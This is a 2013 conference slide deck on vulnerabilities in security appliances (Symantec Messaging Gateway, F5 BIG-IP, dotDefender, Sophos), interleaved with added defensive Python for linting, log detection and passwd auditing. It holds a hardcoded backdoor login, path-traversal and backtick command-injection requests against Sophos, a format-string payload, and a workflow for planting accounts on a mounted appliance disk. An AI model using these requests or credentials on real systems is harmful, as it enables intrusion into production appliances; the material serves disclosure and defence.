1.3. (In)security Software

(in)Security Software, by Alexander Antukh, May 26, 2013

Description: Vulnerabilities in Security Software

Page 1: 1.3. (In)security Software

(in)Security Software
By Alexander Antukh

May 26, 2013

Page 2: 1.3. (In)security Software

/whoami

Alexander Antukh

Security Consultant
Offensive Security Certified Expert
Interests: kittens and stuff

Page 3: 1.3. (In)security Software


Agenda

• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA


Page 4: 1.3. (In)security Software


The question

Do you know anybody less boring?
What if the SS is vulnerable itself?


Page 5: 1.3. (In)security Software


The answer

*sorry for my English


Page 6: 1.3. (In)security Software

The answer

• Symantec Messaging Gateway
  – Backdoor by design → Code execution
• F5 BIG-IP
  – SQL Injection, XXE → Passwords… Root access
• Applicure dotDefender WAF
  – Format string vulnerability → Code execution
• Sophos Web Protection Appliance
  – LFI, OS Command Injection → Command execution, admin account pwn

Security software products are the target of the trade ... already!

Page 7: 1.3. (In)security Software

The answer

“... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...“

Symantec Messaging Gateway v.9.5.x

SSH?!
Login: support
MD5: 52e3bbafc627009ac13caff1200a0dbf
Password: symantec

Page 9: 1.3. (In)security Software

The answer

F5 BIG-IP <= 11.2.0

“... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“

sam/admin/reports/php/getSettings.php

Page 13: 1.3. (In)security Software

The answer

AppliCure dotDefender WAF <= 4.26

“... dotDefender is a web application security solution (a Web Application Firewall, or WAF) that offers strong, proactive security for your websites and web applications ...“

Web Attack?

Page 14: 1.3. (In)security Software

The answer

AppliCure dotDefender WAF <= 4.26

Error page can be configured in different ways:

Vars to be added to the body of a custom page:

• %MAILTO_BLOCK% - email entered in the “Email address for blocked request report” field
• %RID% - reference ID
• %IP% - server's IP address
• %DATE_TIME% - date of blocked request

Looks nice…

Page 15: 1.3. (In)security Software

The answer

AppliCure dotDefender WAF <= 4.26

Format string injection

Algorithm:
• Variables
• Buffer
• ...
• AP_PRINTF()

<%IP%> Host: …

%666d\xBA\xAD\xBE\xEF…

check for format string vulnerabilities… should be

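The dotDefender slides describe a custom block page whose placeholders (%MAILTO_BLOCK%, %RID%, %IP%, %DATE_TIME%) are expanded into a buffer that then reaches AP_PRINTF() as the format string, so request text sitting next to the server IP (the "<%IP%> Host: …" line) can carry directives such as %666d into the call. The Python below is an added example, not dotDefender's code or the presenter's: it shows the lint a defender can run on the expanded buffer before it is printed, and the unsafe versus safe way of handing that buffer to a printf-style function. The template, the field values, the assumption that the blocked request's Host header is echoed after %IP%, and all function names are constructed for illustration.

```python
"""Lint and safe emission for a WAF block page whose expanded body is
afterwards handed to a printf-style call (the AP_PRINTF() step on the slide).

Added example, not dotDefender code. The placeholder names come from the
slide; TEMPLATE, FIELDS, the echoed Host header and every function name are
constructed for illustration.
"""
import re

# Placeholders the custom block page may carry (listed on the slide).
PLACEHOLDERS = ("%MAILTO_BLOCK%", "%RID%", "%IP%", "%DATE_TIME%")

# A printf conversion directive: '%' flags width .precision length conversion.
# '%%' is matched too so that a literal percent sign is consumed as a unit
# and is then filtered out, exactly as a printf parser would treat it.
PRINTF_DIRECTIVE = re.compile(
    r"%%|%[-+ #0]*(?:\d+|\*)?(?:\.(?:\d+|\*))?"
    r"(?:hh|h|ll|l|L|j|z|t)?[diouxXeEfFgGaAcspn]"
)

# Constructed admin template and the values the appliance would fill in.
TEMPLATE = ("Request blocked. Reference %RID% at %DATE_TIME%. "
            "Report to %MAILTO_BLOCK%. <%IP%> Host: ")
FIELDS = {
    "%RID%": "4711",
    "%DATE_TIME%": "2013-05-26 10:00:00",
    "%MAILTO_BLOCK%": "blocked@example.test",
    "%IP%": "10.0.0.5",
}


def build_block_page(template, fields, request_host):
    """Expand the placeholders and append the blocked request's Host header
    (assumption: that is how request text lands next to %IP% on the slide).
    The header is copied verbatim, so whatever the client sent is now in the
    buffer the appliance is about to print."""
    body = template
    for ph in PLACEHOLDERS:
        body = body.replace(ph, fields.get(ph, ""))
    return body + request_host


def find_directives(buf):
    """Return every printf directive in buf. Any hit means the buffer must
    not be used as a format string; since request text is inside, an empty
    result is no guarantee either, only the emit_safe path is."""
    masked = buf
    for ph in PLACEHOLDERS:          # an unexpanded placeholder is not a directive
        masked = masked.replace(ph, " " * len(ph))
    return [m.group(0) for m in PRINTF_DIRECTIVE.finditer(masked)
            if m.group(0) != "%%"]


def emit_unsafe(body):
    """Stand-in for AP_PRINTF(body): the buffer *is* the format string.
    Python raises where C would walk the stack for the missing arguments."""
    return body % ()


def emit_safe(body):
    """Stand-in for AP_PRINTF("%s", body): the buffer is only an argument,
    so '%666d' inside it is printed literally."""
    return "%s" % body


def unsafe_emit_fails(body):
    """True when the vulnerable path cannot even format the buffer."""
    try:
        emit_unsafe(body)
    except (TypeError, ValueError):
        return True
    return False


if __name__ == "__main__":
    for host in ("www.example.test", "%666d%n"):
        page = build_block_page(TEMPLATE, FIELDS, host)
        print(repr(host), "->", find_directives(page), "| safe tail:", emit_safe(page)[-24:])
```

The lint is a detection aid for templates and logs; the actual fix is the emit_safe shape, where the expanded page is passed as an argument to a fixed "%s" format and request-derived text is never the format string itself.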
Page 17: 1.3. (In)security Software

The answer

Sophos Web Protection Appliance <= 3.7.8.1

“... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“

https://<host>/cgi-bin/patience.cgi?id=..

?id=../../persist/config/shared.conf%00
?id=../../log/ui_access_log%00

"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"

Passwords!

Page 18: 1.3. (In)security Software

The answer

Sophos Web Protection Appliance <= 3.7.8.1

Diagnostic Tools

POST /index.php?c=diagnostic_tools HTTP/1.1
...
action=wget&section=configuration&STYLE=<validsessid>&url=%60sleep%205%60

Page 19: 1.3. (In)security Software

The answer

Sophos Web Protection Appliance <= 3.7.8.1

Block page (%%user_workstation%%)

https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60

Page 20: 1.3. (In)security Software

The answer

Sophos Web Protection Appliance <= 3.7.8.1

Local Site List

POST /index.php?c=local_site_list_editor HTTP/1.1
...
STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]

Page 22: 1.3. (In)security Software

The answer

Sophos Web Protection Appliance <= 3.7.8.1

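The Sophos slides show two request shapes that leave a trace in an ordinary access log: the patience.cgi traversal with a %00 terminator, and a backtick command substitution inside a GET parameter (the block-page client-ip case). The Python below is an added detection example, not Sophos code or the presenter's: it parses constructed combined-format log lines, decodes each query parameter and flags those two patterns. The log lines, rule names and function names are all made up for the example.

```python
"""Detection pass over web-appliance access-log lines for the two request
shapes the Sophos slides show: directory traversal with a %00 terminator
against patience.cgi, and shell command substitution (backticks) inside a
query parameter.

Added example, not Sophos code or the presenter's. LOG_LINES are constructed
in Apache combined format; the rule names and function names are made up.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# combined format: src ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# What to look for in each decoded parameter value.
RULES = (
    ("path-traversal", re.compile(r"\.\./|\.\.\\")),
    ("null-byte", re.compile(r"\x00")),
    ("shell-substitution", re.compile(r"`|\$\(")),
)

LOG_LINES = [  # constructed sample lines
    '10.0.0.7 - - [26/May/2013:10:01:02 +0000] "GET /cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [26/May/2013:10:01:09 +0000] "GET /end-user/index.php?reason=application&client-ip=%20%60sleep+10%60 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [26/May/2013:10:01:15 +0000] "POST /index.php?c=diagnostic_tools HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [26/May/2013:10:02:00 +0000] "GET /cgi-bin/patience.cgi?id=7f3a HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


def inspect_line(line):
    """Parse one log line and return its parameter findings, or None when the
    line is not in combined format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)      # second decode catches %2500-style double encoding
        for label, rx in RULES:
            if rx.search(value):
                findings.append((label, name))
    return {"src": m.group("src"), "method": m.group("method"),
            "path": parts.path, "findings": findings}


def scan(lines):
    """Parsed records for all well-formed lines, in input order."""
    return [rec for rec in map(inspect_line, lines) if rec is not None]


def suspicious(lines):
    """Only the records that carried at least one finding."""
    return [rec for rec in scan(lines) if rec["findings"]]


if __name__ == "__main__":
    for rec in suspicious(LOG_LINES):
        print(rec["src"], rec["method"], rec["path"], rec["findings"])
```

The third constructed line is the limitation of this pass: the diagnostic_tools and local_site_list_editor injections travel in a POST body, which an access log never records, so those two slides need inspection at the WAF or application layer (the url and entries fields) rather than in the access log.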
Page 24: 1.3. (In)security Software

Vuln, where art thou?

• Methods for identifying usable bugs in “Software products”
  – Application testing and Fuzzing
  – Reverse engineering
  – Source code analysis
• A short note on so called “security scanning” tools

Page 25: 1.3. (In)security Software

Vuln, where art thou?

• The workflow for the appliance analysis is pretty simple!
  – get a virtual appliance demo version
  – install the appliance
  – add the .vmdk to another vm and mount it there (or use a linux fs driver that can mount vmdk files)
  – add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config)
  – start the appliance again and log in :)
  – look at the services that are running (and their configuration)
  – pwnage ;)

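The workflow above works because the appliance disk can be mounted and edited offline, so /etc/passwd, the sudoers file and the sshd config are only as trustworthy as they were at the last boot. The Python below is an added example, not from the presentation: a boot-time audit that diffs the live passwd against a trusted baseline (new account, changed UID or shell, a second UID 0 entry, a changed password field) and checks digests of the two config files the slide names. The passwd and config contents are constructed, the function names are made up, and where the baseline is stored is an assumption.

```python
"""Boot-time integrity audit for the files the appliance workflow on the
slide edits offline: /etc/passwd (new account, changed UID or shell, a
second UID 0), plus a digest check for sudoers and sshd_config.

Added example, not from the presentation. The passwd text, config text and
function names are constructed; the baseline is assumed to live somewhere
the running appliance can trust (read-only media or a signed manifest).
"""
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    password: str   # usually "x" (the hash lives in /etc/shadow)
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd(5) text into a name -> entry map; malformed lines raise."""
    entries = {}
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            raise ValueError(f"passwd line {n}: expected 7 fields, got {len(f)}")
        entries[f[0]] = PasswdEntry(f[0], f[1], int(f[2]), int(f[3]), f[5], f[6])
    return entries


def audit_passwd(baseline_text, current_text):
    """Diff the live passwd against the baseline and return (label, account)
    findings in a fixed order so the result is easy to compare and alert on."""
    base, cur = parse_passwd(baseline_text), parse_passwd(current_text)
    findings = [("added-account", n) for n in sorted(set(cur) - set(base))]
    findings += [("removed-account", n) for n in sorted(set(base) - set(cur))]
    for name in sorted(set(base) & set(cur)):
        b, c = base[name], cur[name]
        if b.uid != c.uid:
            findings.append(("uid-changed", name))
        if b.shell != c.shell:
            findings.append(("shell-changed", name))
        if b.password != c.password:   # hash placed in passwd itself, or a lock removed
            findings.append(("password-field-changed", name))
    for e in sorted(cur.values(), key=lambda e: e.name):
        if e.uid == 0 and e.name != "root":
            findings.append(("extra-uid0", e.name))
    return findings


def build_manifest(files):
    """SHA-256 per path; this is what the trusted baseline would store."""
    return {p: hashlib.sha256(t.encode()).hexdigest() for p, t in files.items()}


def config_drift(manifest, current_files):
    """Paths whose current content no longer matches the manifest (or that
    the manifest has never seen)."""
    return sorted(p for p, t in current_files.items()
                  if hashlib.sha256(t.encode()).hexdigest() != manifest.get(p))


# Constructed sample data.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sysop:x:1001:1001:sysop:/home/sysop:/usr/sbin/nologin
"""
CURRENT_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
sysop:x:0:1001:sysop:/home/sysop:/bin/bash
analyst:x:1002:1002::/home/analyst:/bin/bash
"""
BASELINE_CONFIGS = {
    "/etc/sudoers": "root ALL=(ALL:ALL) ALL\n",
    "/etc/ssh/sshd_config": "PermitRootLogin no\nPasswordAuthentication no\n",
}
CURRENT_CONFIGS = {
    "/etc/sudoers": "root ALL=(ALL:ALL) ALL\n",
    "/etc/ssh/sshd_config": "PermitRootLogin yes\nPasswordAuthentication no\n",
}

if __name__ == "__main__":
    for finding in audit_passwd(BASELINE_PASSWD, CURRENT_PASSWD):
        print("passwd:", *finding)
    for path in config_drift(build_manifest(BASELINE_CONFIGS), CURRENT_CONFIGS):
        print("drift:", path)
```

The audit only detects; it does not prevent the offline edit, and the baseline and the auditing script are themselves on the same disk unless placed elsewhere. The structural mitigation is to make the .vmdk step fail in the first place, with an encrypted or integrity-protected root filesystem, and to run a check like this one from the trusted side of that boundary.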
Page 27: 1.3. (In)security Software

Vuln, where art thou?

*Move two matches to make it three equal squares


Page 30: 1.3. (In)security Software

And now for something completely different

Sometimes it’s easier to find the vulnerability than might be expected . . .

*doesn’t exist yet

Page 31: 1.3. (In)security Software

QA
